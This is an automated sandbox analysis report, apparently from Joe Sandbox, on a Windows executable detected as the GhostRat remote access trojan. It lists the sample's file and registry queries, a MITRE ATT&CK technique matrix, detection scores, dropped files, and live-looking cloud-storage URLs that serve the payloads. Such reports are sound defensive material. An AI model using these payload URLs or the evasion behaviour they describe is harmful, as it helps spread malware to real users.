Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Program Files\Weekplus\APP.exe VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Code function: 0_2_00007FFDA5591E20 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FFDA5591E20

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected GhostRat

Source: Yara match	File source: 0000000A.00000002.2494581238.00000196FBA70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GamePlusPlus.exe PID: 6276, type: MEMORYSTR

Remote Access Functionality

Yara detected GhostRat

Source: Yara match	File source: 0000000A.00000002.2494581238.00000196FBA70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GamePlusPlus.exe PID: 6276, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	1 Native API	1 DLL Side-Loading	12 Process Injection	3 Masquerading	31 Input Capture	1 System Time Discovery	Remote Services	31 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	1 Query Registry	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	51 Virtualization/Sandbox Evasion	Security Account Manager	61 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	51 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	21 Peripheral Device Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	2 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	36 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
#U6c47#U8054#U652f#U4ed8.exe	29%	Virustotal		Browse
#U6c47#U8054#U652f#U4ed8.exe	16%	ReversingLabs	ByteCode-MSIL.Virus.Virut
#U6c47#U8054#U652f#U4ed8.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Program Files\Weekplus\APP.exe	100%	Joe Sandbox ML
C:\Program Files\Weekplus\GamePlusPlus.exe	0%	ReversingLabs
C:\Program Files\Weekplus\steam_api64.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com/openvr_api.dll	0%	Avira URL Cloud	safe
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com/GamePlusPlus.exe	0%	Avira URL Cloud	safe
https://wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com/steam_api64.dll	0%	Avira URL Cloud	safe
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com/mpclient64.dat	0%	Avira URL Cloud	safe
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com	0%	Avira URL Cloud	safe
https://www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com/mpclient.dat	0%	Avira URL Cloud	safe
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com/APP.exe	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.pngxk	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cq.file.myqcloud.com	183.66.100.45	true	false	unknown
gz.file.myqcloud.com	159.75.57.35	true	false	high
wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com	unknown	unknown	true	unknown
www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com	unknown	unknown	true	unknown
wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com/openvr_api.dll	false	Avira URL Cloud: safe	unknown
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com/APP.exe	false	Avira URL Cloud: safe	unknown
https://www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com/mpclient.dat	false	Avira URL Cloud: safe	unknown
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com/GamePlusPlus.exe	false	Avira URL Cloud: safe	unknown
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com/mpclient64.dat	false	Avira URL Cloud: safe	unknown
https://wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com/steam_api64.dll	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2510566311.0000000015989000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2397216375.000000001362F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005BF1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	APP.exe, 00000003.00000002.2369177126.00000000037E4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005BF1000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2369177126.00000000037E4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	APP.exe, 00000003.00000002.2369177126.00000000037E4000.00000004.00000800.00020000.00000000.sdmp	false		high
